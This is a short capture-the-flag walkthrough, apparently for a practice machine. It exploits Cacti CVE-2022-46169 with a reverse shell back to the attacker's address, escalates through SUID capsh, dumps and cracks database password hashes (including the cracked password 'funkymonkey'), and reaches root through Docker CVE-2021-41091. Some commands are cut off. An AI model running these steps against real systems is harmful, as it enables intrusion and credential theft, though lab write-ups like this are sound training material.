we find a exploit on github that we can use to get user.

python3 CVE-2022-46169.py -u http://10.10.11.211 --LHOST=10.10.14.11 --LPORT=9999

md5 hashes found

admin','21232f297a57a5a743894a0e4a801fc3

guest','43e9a4ab75570f5b'

these are pointless

we find a file called entrypoint.sh which has sql creds however none work

mysql --host=db --user=root --password=root cacti

suid capsh is available so we can use this to become root

cd /sbin

./capsh --gid=0 --uid=0 --

however we still have no flags

Looks like mysql does work(just not for me)

mysql --host=db --user=root --password=root cacti -e "show table

we can get the hash for marcus $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C

hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt

marcus:funkymonkey

on marcus we can find the docker version with

docker -

dockerversion 20..10.5 which has an exploit CVE-2021-41091

once we use the exploit you can cd var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bash

execute ./bash -p

we are root